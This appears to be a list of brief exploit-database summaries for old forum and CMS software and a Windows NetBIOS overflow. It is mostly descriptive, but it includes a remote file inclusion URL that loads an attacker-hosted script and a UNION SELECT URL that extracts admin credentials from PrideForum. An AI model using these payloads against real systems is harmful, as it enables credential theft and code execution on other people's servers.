This exploits works on ASPSitem <= 2.0. An attacker can use a SQL injection to leak userid 1's login information from the database. An attacker can also read others private messages by using the URL http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername.
This exploits works on phpBB 2.x (Activity MOD Plus). Succesful exploitation needs register_globals on GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]. Requires magic_quotes_gpc off EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt. Requires allow_url_fopen on.
UBBThreads 5.x,6.x is vulnerable to multiple file inclusion vulnerabilities. An attacker can exploit this vulnerability to include arbitrary files from the local system or remote system. This can be exploited to execute arbitrary code on the vulnerable system.
Eggblog <= 3.0.6 (rss/posts.php id) Remote SQL injection allows an attacker to list all users and passwords by sending a specially crafted request to the vulnerable server.
This exploits works on F@cile Interactive Web <= 0.8x. It includes File Inclusion Vulnerabilities, Cross Site Scripting, and Information disclosure. The File Inclusion Vulnerabilities can be exploited by sending a malicious URL to the victim. The Cross Site Scripting can be exploited by sending a malicious URL with XSS payloads. The Information disclosure can be exploited by sending a malicious URL with an etc/passwd payload.
Multiple Remote SQL Injection Vulnerabilities exist in Enigma Haber <= 4.3. An attacker can exploit these vulnerabilities to gain access to sensitive information such as passwords, usernames, emails, etc. The vulnerable parameters are 'id', 'yo', 'ara', 'ko', 'k', 'd', 'e', 'ay', 'yil', 'e_kad', 'yid', 'bid', 'hid', 'o', 'kid', 'tur', 's'. An attacker can send malicious SQL queries to the vulnerable parameters to gain access to sensitive information.
This exploits works on tinyBB <= 0.3. It includes a Remote File Include vulnerability, a Local File Include vulnerability, and a SQL injection vulnerability. The Remote File Include vulnerability allows an attacker to include a remote file on the vulnerable server. The Local File Include vulnerability allows an attacker to include a local file on the vulnerable server. The SQL injection vulnerability allows an attacker to inject malicious SQL code into the vulnerable server.
A remote buffer overflow exists in the NetBIOS service of Windows XP SP2/SP1/2000/2003/NT4.0/ME/98/95. By sending a specially crafted packet to the NetBIOS service, a remote attacker can execute arbitrary code with SYSTEM privileges.
This exploit allows an attacker to create an admin account on MiniNuke v2.x by exploiting a SQL injection vulnerability. The attacker needs to provide the victim's host, path to MiniNuke, desired username, password and mail for the username. The exploit then gets the session and security code from the victim's host and registers the admin account.
PrideForum 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. An example exploit URL is http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
Services By CQR